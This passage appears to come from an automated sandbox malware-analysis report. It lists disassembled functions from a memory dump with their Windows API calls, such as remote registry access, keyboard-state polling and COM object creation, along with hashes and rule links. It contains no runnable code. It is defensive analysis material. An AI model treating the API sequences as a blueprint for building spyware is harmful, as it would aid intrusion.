                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002C1093
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002C10AF
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002C10CB
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002C10F5
                                                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002C111D
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C1128
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C112D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                                                        • Opcode ID: 8ca26926b3aa457bfd3c0da031a3df3a90e220d6c0bd71d0366d71f68ece26e5
                                                                                                                                                                        • Instruction ID: 86e1d0d5fd5d521cef622e784bd4d1d1c41e1d2859f74fb3fe1d0585df5dd264
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ca26926b3aa457bfd3c0da031a3df3a90e220d6c0bd71d0366d71f68ece26e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 67410972C20129ABCB21EFA4EC46DEEB778FF04750F444169E901A2161EB719EA4CF50
                                                                                                                                                                        Function 002F4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002F4AD9
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 002F4AE0
                                                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002F4AF3
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002F4AFB
                                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 002F4B06
                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 002F4B10
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002F4B1A
                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 002F4B30
                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 002F4B3C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                        • String ID: static
                                                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                                                        • Opcode ID: 1a272952f0576f79772fa1c8a271ca1a7b514c4357129456d34ee9cfef83bcf8
                                                                                                                                                                        • Instruction ID: d556dbfa2ceb7ecc8c3ad3fc74dfc3b162f2a80dc79446ab98c478ec2ed9d462
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a272952f0576f79772fa1c8a271ca1a7b514c4357129456d34ee9cfef83bcf8
                                                                                                                                                                        • Instruction Fuzzy Hash: D0316031510219BBDF11AF64EC08FEB7B6AFF093A4F110221FA15D61A0C775D860DB94
                                                                                                                                                                        Function 002E468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E46B9
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002E46E7
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002E46F1
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E478A
                                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 002E480E
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 002E4932
                                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 002E496B
                                                                                                                                                                        • CoGetObject.OLE32(?,00000000,00300B64,?), ref: 002E498A
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 002E499D
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002E4A21
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E4A35
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                                                        • Opcode ID: e1e976d4222e942c67dcec5ae019cc97d5278504dc8a8ee4f703a9d1c64ecea5
                                                                                                                                                                        • Instruction ID: ecda7c2073393b266250fc04bdc72f502713fad272f764234864e744212457d0
                                                                                                                                                                        • Opcode Fuzzy Hash: e1e976d4222e942c67dcec5ae019cc97d5278504dc8a8ee4f703a9d1c64ecea5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6AC166716283459FD700EF69C88492BB7E9FF89348F40492DF98A9B211DB30ED15CB92
                                                                                                                                                                        Function 002D84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002D8538
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002D85D4
                                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 002D85E8
                                                                                                                                                                        • CoCreateInstance.OLE32(00300CD4,00000000,00000001,00327E8C,?), ref: 002D8634
                                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002D86B9
                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 002D8711
                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 002D879C
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002D87BF
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 002D87C6
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 002D881B
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002D8821
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                                                        • Opcode ID: 60a70d2f053a277d11948f33a6f59e8dfc799be0c27e62648dcbc43a37857900
                                                                                                                                                                        • Instruction ID: 7238b78ace498f5977a708ca3ff5cbc37a6af95e9a0df9baec6818a5a8574d56
                                                                                                                                                                        • Opcode Fuzzy Hash: 60a70d2f053a277d11948f33a6f59e8dfc799be0c27e62648dcbc43a37857900
                                                                                                                                                                        • Instruction Fuzzy Hash: 40C12875A10109AFDB14DFA4C888DAEBBF9FF48354B1485A9E41ADB361CB30ED41CB90
                                                                                                                                                                        Function 002C0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002C039F
                                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 002C03F8
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002C040A
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 002C042A
                                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 002C047D
                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 002C0491
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002C04A6
                                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 002C04B3
                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C04BC
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002C04CE
                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C04D9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                                        • Opcode ID: 1dd465f665630c2d510d2be209622d341f0a80438b7a8ef1dbd750ca94f529de
                                                                                                                                                                        • Instruction ID: 92978266e9d5387f5fa1bfc4148ba884df2e3b79741f8d397717104238c5b6b3
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dd465f665630c2d510d2be209622d341f0a80438b7a8ef1dbd750ca94f529de
                                                                                                                                                                        • Instruction Fuzzy Hash: 01416035A10219DFCF14DFA4D888EAEBBB9FF48354F008169E915A7261CB70A955CFA0
                                                                                                                                                                        Function 002CA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CA65D
                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 002CA6DE
                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 002CA6F9
                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 002CA713
                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 002CA728
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 002CA740
                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 002CA752
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 002CA76A
                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 002CA77C
                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 002CA794
                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 002CA7A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                        • Opcode ID: 70f983864c66b01b79c4123a498cbc0965de46d51da36a2a8db33946211437c9
                                                                                                                                                                        • Instruction ID: 257a78d136f7c8d4a3273e5f456d88788a0fe1d47c0b9bd67e252db2cb573a9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 70f983864c66b01b79c4123a498cbc0965de46d51da36a2a8db33946211437c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0141D2645147CF69FF314F609408BA9FAB5BB11358F08825DC5C64A1C2EB9499E8C793
                                                                                                                                                                        Function 002E9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                                                        • Opcode ID: 363d782443fbd26ecb034538d9067ecaf03d5eede2a7abf21f535f1bd70abba6
                                                                                                                                                                        • Instruction ID: 75d16c1f3fd1e31f7eaf9f8d2f0fe9743893bdc3ec114d7e47c9295b1f770bfd
                                                                                                                                                                        • Opcode Fuzzy Hash: 363d782443fbd26ecb034538d9067ecaf03d5eede2a7abf21f535f1bd70abba6
                                                                                                                                                                        • Instruction Fuzzy Hash: DB510731A601579BCB10EF6AC9509BEB3A5BF153507A0422BE826E7291D731DDA0CB90
                                                                                                                                                                        Function 002E4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32 ref: 002E41D1
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002E41DC
                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00300B44,?), ref: 002E4236
                                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 002E42A9
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E4341
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E4393
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                                                        • Opcode ID: 1e703ac677c1e6507d74f3786d1355f44b597154a1cd259c600635292cc6fde1
                                                                                                                                                                        • Instruction ID: 4e6a33f53cd492b1427004a518f4fdfafb632930829328fe2d99cf59594c4263
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e703ac677c1e6507d74f3786d1355f44b597154a1cd259c600635292cc6fde1
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E61DE70668341EFC310EF65D888F6ABBE4AF88714F500959FA859B291CB70ED54CB92
                                                                                                                                                                        Function 002D8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 002D8C9C
                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D8CAC
                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002D8CB8
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D8D55
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8D69
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8D9B
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D8DD1
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8DDA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                                                        • Opcode ID: d1fef2b7259f53655c990118ac4f682345ef93323428c8dffb355d1535cbc12d
                                                                                                                                                                        • Instruction ID: d42c3d5901148d2c614b1577555581449672ec24a8bb37150c35b3657d01696c
                                                                                                                                                                        • Opcode Fuzzy Hash: d1fef2b7259f53655c990118ac4f682345ef93323428c8dffb355d1535cbc12d
                                                                                                                                                                        • Instruction Fuzzy Hash: 046159765243059FCB10EF64C844AAEB3E9FF89310F04492EE99987291DB31E965CF92
                                                                                                                                                                        Function 002F46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMenu.USER32 ref: 002F4715
                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 002F4724
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F47AC
                                                                                                                                                                        • IsMenu.USER32(?), ref: 002F47C0
                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 002F47CA
                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F47F7
                                                                                                                                                                        • DrawMenuBar.USER32 ref: 002F47FF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                        • Opcode ID: b15ed399f1528d6d2134051a6d4246d4bb313e07af429878a201a8c28849ccb7
                                                                                                                                                                        • Instruction ID: a9bc8e558a78e8143eff1c4fec7712d55c3a07695834223d6dcc2c2ac18bf7a2
                                                                                                                                                                        • Opcode Fuzzy Hash: b15ed399f1528d6d2134051a6d4246d4bb313e07af429878a201a8c28849ccb7
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D419F74A1120AEFDB14EF64E848EBABBB5FF09394F144028FA4597350D7B0A924CF50
                                                                                                                                                                        Function 002C282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002C28B1
                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 002C28BC
                                                                                                                                                                        • GetParent.USER32 ref: 002C28D8
                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C28DB
                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 002C28E4
                                                                                                                                                                        • GetParent.USER32(?), ref: 002C28F8
                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C28FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                        • Opcode ID: 1085c195d0de11abfd1cbcc90dc3fe1cf787ba798c229efa8698c45dfc6f3d0a
                                                                                                                                                                        • Instruction ID: c75f2cf50d8ebe3dc0b3c821afb63bc786ddcfe8a049a88123946436afc498a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1085c195d0de11abfd1cbcc90dc3fe1cf787ba798c229efa8698c45dfc6f3d0a
                                                                                                                                                                        • Instruction Fuzzy Hash: A621AF74D10118EBCF01AFA0DC89EEEBBA9EF09350F10026AB951A7291DB755868DF60
                                                                                                                                                                        Function 002C290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 002C2990
                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 002C299B
                                                                                                                                                                        • GetParent.USER32 ref: 002C29B7
                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C29BA
                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 002C29C3
                                                                                                                                                                        • GetParent.USER32(?), ref: 002C29D7
                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C29DA
